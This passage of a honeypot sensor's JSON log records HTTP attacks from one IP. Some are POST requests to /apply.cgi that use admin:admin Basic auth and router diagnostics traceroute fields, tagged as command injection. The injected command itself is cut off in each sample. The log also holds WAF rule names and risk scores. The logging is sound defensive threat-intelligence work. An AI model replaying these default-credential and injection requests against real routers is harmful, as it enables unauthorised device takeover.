43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 82, \u0022tag_count\u0022: 12, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00221c5dcf3e0abf2bbffb5e61322e8d6db5b1633b92\u0022, \u0022event_fingerprint\u0022: \u0022776ffb2a7499e20a6aef854f832a2ad0b7b0ea31\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022Cred Basic auth spray\u0022, \u0022CRS 932205\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022b6e4d00926355a796a8d2b9ce095564f\u0022, \u0022path_pattern_hash\u0022: \u0022b3e1dfd605a877958cebee595444f5d1\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 82}, \u0022payload_preview\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-url\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 352\\r\\nConnection: close\\r\\n\\r\\nsubmit_button=Diagnostics\u0026change_action=gozila_cgi\u0026submit_type=start_tracerou\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-url\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 352\\r\\nConnection: close\\r\\n\\r\\nsubmit_button=Diagnostics\u0026change_action=gozila_cgi\u0026submit_type=start_tracerou\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-url\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022961b6d4ca5019bcbf95dbbe8fe0490fcdabbe834\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-url\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 82\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 82, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-url\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 5 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":531},{"id":11809666,"ip":"45.153.34.252","ts":"2026-07-14 02:29:28.000000","proto":"tcp","src_port":47774,"dst_port":8081,"service":"http","classification":"web_probe","waf_score":3,"waf_tags":"[\u0022950734:sap-sapcontrol-path\u0022]","http_method":"GET","http_target":"\/","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 3, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 0, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u002242099b4af021e53fd8fd4e056c2568d7c2e3ffa8\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 99, \u0022payload_entropy\u0022: 5.018012746618279, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 20.0, \u0022risk_classification\u0022: 38.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 5.1, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 20.0, \u0022classification\u0022: 38.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 40, \u0022tag_count\u0022: 5, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022d2680103be2dcdd2f3d5a8939d6e6f644380c59b\u0022, \u0022event_fingerprint\u0022: \u00226200042a8eedd96c47b109adc0963a36d177f604\u0022, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00222302682c110a52c654ac710424b04c41\u0022, \u0022path_pattern_hash\u0022: \u00228a5edab282632443219e051e4ade2d1d\u0022}, \u0022service_name\u0022: \u0022http\u0022, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 40}, \u0022payload_preview\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/\u0022, \u0022waf_tags\u0022: [\u0022950734:sap-sapcontrol-path\u0022], \u0022waf_rule_names\u0022: [\u0022sap-sapcontrol-path\u0022], \u0022request_line\u0022: \u0022GET \/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nConnection: close\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/\u0022, \u0022waf_tags\u0022: [\u0022950734:sap-sapcontrol-path\u0022], \u0022waf_rule_names\u0022: [\u0022sap-sapcontrol-path\u0022], \u0022request_line\u0022: \u0022GET \/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nConnection: close\u0022, \u0022classification_reason\u0022: \u0022Sonde HTTP (tag sap-sapcontrol-path) \u00b7 confiance 80%\u0022}, \u0022classification_reason\u0022: \u0022Sonde HTTP (tag sap-sapcontrol-path) \u00b7 confiance 80%\u0022, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 20.0, \u0022classification\u0022: 38.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 40}, \u0022attack_stage\u0022: \u0022probe\u0022, \u0022mitre_tactics\u0022: [\u0022TA0007\u0022, \u0022TA0001\u0022], \u0022mitre\u0022: \u0022TA0007\u0022, \u0022threat_family\u0022: [\u0022scanner\u0022], \u0022confidence\u0022: 0.8, \u0022classification_confidence\u0022: 0.8, \u0022recommended_client_action\u0022: \u0022monitor\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022131b88627b005953e3e4760624ae297ab5913542\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/\u0022, \u0022request_line\u0022: \u0022GET \/ HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nConnection: close\u0022, \u0022attack_vector\u0022: \u0022Sonde HTTP \u00b7 via HTTP:8081 \u00b7 (sonde \/ probe)\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 80 % \u2014 Score WAF 20 \u00b7 1 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Sonde HTTP (tag sap-sapcontrol-path) \u00b7 confiance 80%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Sonde HTTP (tag sap-sapcontrol-path) \u00b7 confiance 80%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u00b7 risque 40\/100\u0022, \u0022confidence_pct\u0022: 80, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 20.0, \u0022classification\u0022: 38.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 40}, \u0022attack_stage\u0022: \u0022probe\u0022, \u0022attack_stage_label\u0022: \u0022Sonde \/ probe\u0022, \u0022attack_chain_stage\u0022: \u0022discovery\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022D\u00e9couverte\u0022, \u0022risk_score\u0022: 40, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: null, \u0022tags_summary_labels_fr\u0022: null, \u0022recommended_action\u0022: \u0022monitor\u0022, \u0022recommended_action_label\u0022: \u0022Surveiller\u0022, \u0022mitre\u0022: \u0022TA0007\u0022, \u0022mitre_technique\u0022: \u0022TA0007\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/\u0022, \u0022request_line\u0022: \u0022GET \/ HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022Sonde HTTP \u00b7 via HTTP:8081 \u00b7 (sonde \/ probe)\u0022, \u0022evidence_snippet\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nConnection: close\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 80 % \u2014 Score WAF 20 \u00b7 1 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 80 % \u2014 Score WAF 20 \u00b7 1 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022discovery\u0022, \u0022label_fr\u0022: \u0022D\u00e9couverte\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022discovery\u0022, \u0022matched_patterns\u0022: [], \u0022ban_policy\u0022: \u0022advisory_monitor\u0022, \u0022tags_list\u0022: [\u0022950734:sap-sapcontrol-path\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950734:sap-sapcontrol-path\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":4,"bytes_in":99},{"id":11809662,"ip":"45.153.34.252","ts":"2026-07-14 02:29:26.000000","proto":"tcp","src_port":35886,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":34,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/apply.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 5, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u002231402cc48ac7ac052e1d50fc94349665a12c2c45\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 513, \u0022payload_entropy\u0022: 5.371856273522132, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 82, \u0022tag_count\u0022: 12, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00221c5dcf3e0abf2bbffb5e61322e8d6db5b1633b92\u0022, \u0022event_fingerprint\u0022: \u0022776ffb2a7499e20a6aef854f832a2ad0b7b0ea31\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022Cred Basic auth spray\u0022, \u0022CRS 932205\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00225d1dd1b2ab0be30667e26d4dcc8c51f1\u0022, \u0022path_pattern_hash\u0022: \u0022b3e1dfd605a877958cebee595444f5d1\u0022}, 